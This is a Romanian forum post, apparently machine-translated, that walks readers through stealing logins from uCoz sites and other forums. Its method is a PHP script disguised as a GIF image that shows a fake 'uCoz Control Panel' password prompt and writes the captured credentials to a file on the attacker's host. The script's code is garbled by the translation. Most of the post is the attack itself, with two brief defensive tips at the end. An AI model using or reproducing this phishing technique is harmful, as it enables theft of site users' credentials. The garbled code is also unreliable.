Sumar - vorbesc ca un site hack yukoz nu numai domeniu Py de cercetare și de protecție

Și nu am putut găsi aici deja discutat, chiar Anton a demonstrat acest atac aici pe forum, dar pe același hack. resursă a venit peste un Infa interesant ca „off“ pe yukoz, cu toate că această metodă poate fi aplicată la aproape orice forum.

Deci, mai în detaliu de exemplu yukoz (dar puteți încerca și forumuri, adăugând o imagine specificată în semnătura sau în post / chat-ul, de exemplu):

Mai întâi trebuie să vă înregistrați hosting cu php (de exemplu, naște, hotinger, nu contează).

După înregistrarea se toarnă pe script FTP și setați permisiunile 777 pe un fișier .txt gol, de exemplu. passwords.txt (utilizator aici va fi trimis trece site-ul „pohakannogo“).

Apoi, deschideți notebook-ul, dar un carnețel simplu și scrie următoarele:

header ( "Content-type: image / gif");
$ Image = imagecreatefromgif ( 'cool.gif');
if (! $ _COOKIE [ 'LOGON'])
$ = $ _SERVER Conectare [ 'PHP_AUTH_USER'];
$ Pass = $ _SERVER [ 'PHP_AUTH_PW'];
în cazul în care (strlen ($ pass) <= 4 ||. $login )
Header ( 'HTTP / 1.1 401 neautorizat');
Header ( 'WWW-Authenticate: Basic domeniu = "Panou uCoz Control"');
>
elseif (conectare $)
setcookie (MD5 ($ pass 'LOGON').);
$ F = fopen ( 'passwords.txt' 'ab'.);
fwrite ($ f $ de conectare "|||" $ pass "\ r \ n" ....);
fclose ($ f);
>
>
imagegif ($ image);
imagedestroy (imagine $);
?>

După ce totul a scrie - a salva numele de fișier într-un zâmbet răspuns, apoi modificați extensia în PHP și completați găzduirea, astfel smile.php (Nu uitați să setați permisiunile 777 sau 755).

Acum, alegeți orice site yukozovsky site-uri yukozovskih a plecat, ca de obicei, majoritatea are dreptul de mini-chat.

Deci - pentru a începe site-ul zaregistiruytes, apoi pentru a scrie mini autentificare chat și tastați următoarele în corpul mesajului:

După aceea, toți cei care vor merge la această pagină, va apărea forma remarci care va trebui să introduceți un nume de utilizator și o parolă. faci la intrarea în site-ul această formă va apărea remarci prea. Și totuși, de conectare și parola în acest formular va otsylatsya passwords.txt într-un fișier gol pe care l-ați creat la început și turnat pe ftp.

De asemenea, aplicabile la forumuri, blog-uri și care permit imagini intercalare cu părți RESOURCES!

metode de protecție:

1) Inserați imagini Dezactivați din resurse terțe părți;

2) Realizarea unei imagini proxy la serverul lor.

Sunt tot drumul dacă găsiți subiectul pe care a fost deja discutată aici, postați-l în acest thread, pentru a adăuga. informații.